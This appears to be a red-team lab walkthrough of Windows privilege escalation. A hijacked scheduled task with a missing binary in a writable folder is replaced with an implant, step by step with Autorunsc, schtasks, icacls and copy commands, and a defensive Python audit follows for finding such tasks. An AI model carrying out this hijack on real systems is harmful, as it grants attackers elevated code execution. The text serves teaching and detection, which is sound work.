First: Let’s try to find scheduled tasks with a missing binary

Autorunsc64.exe -a t | more

Second: Let’s get more information about that task

schtasks /query /tn OneDriveChk /xml

Notice that the task runs as this user with the highest privileges, and we also get the path of its binary

Third: Let’s check if we can write to that path

icacls C:\RTO\bin\

And yes, we have Modify access

Fourth: Copy our malicious payload to that folder

copy C:\Users\IEUser\Desktop\LPE\implant\implant.exe C:\RTO\bin\OneDriveChk.exe

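The two conditions checked in the second and third steps (a task that runs with the highest privileges, and a binary folder that non-admin users can write to) can be audited from saved command output. The following is an added example, not part of the original walkthrough: it parses the output of the schtasks /query /xml and icacls commands shown above. The sample data is constructed, and the function names and the TRUSTED list are assumptions.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TRUSTED = {"builtin\\administrators", "nt authority\\system"}  # assumption: admin-equivalent
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}  # icacls codes that allow adding or changing files

# Constructed samples shaped like the schtasks /xml and icacls output (not captured from a host).
TASK_XML = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\RTO\bin\OneDriveChk.exe</Command></Exec></Actions>
</Task>"""
ICACLS_OUT = r"""C:\RTO\bin\ BUILTIN\Administrators:(I)(OI)(CI)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)
            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)"""

def writable_by(icacls_text, path):
    """Non-trusted principals granted write rights on `path` itself (deny/inherit-only skipped)."""
    found = set()
    for line in icacls_text.splitlines():
        m = re.match(r"^(.*):((?:\([A-Z,]+\))+)\s*$", line)
        if not m:
            continue
        name = m.group(1).strip()
        if name.lower().startswith(path.lower()):  # first line carries the path prefix
            name = name[len(path):].strip()
        flags = {f for g in re.findall(r"\(([A-Z,]+)\)", m.group(2)) for f in g.split(",")}
        if flags & WRITE_RIGHTS and not flags & {"DENY", "IO"} and name.lower() not in TRUSTED:
            found.add(name)
    return sorted(found)

def audit(task_xml, acl_by_dir):
    """Return (binary, principals) for elevated task actions in a loosely-ACL'd folder."""
    root = ET.fromstring(task_xml)
    if root.findtext("t:Principals/t:Principal/t:RunLevel", "LeastPrivilege", NS) != "HighestAvailable":
        return []
    findings = []
    for cmd in root.findall("t:Actions/t:Exec/t:Command", NS):
        binary = (cmd.text or "").strip().strip('"')
        folder = ntpath.dirname(binary) + "\\"
        who = writable_by(acl_by_dir.get(folder, ""), folder)
        if who:
            findings.append((binary, who))
    return findings

if __name__ == "__main__":
    print(audit(TASK_XML, {"C:\\RTO\\bin\\": ICACLS_OUT}))
```

A non-empty result means the task's folder ACL should be restricted to administrators and SYSTEM, or the task should be removed if its binary is no longer needed.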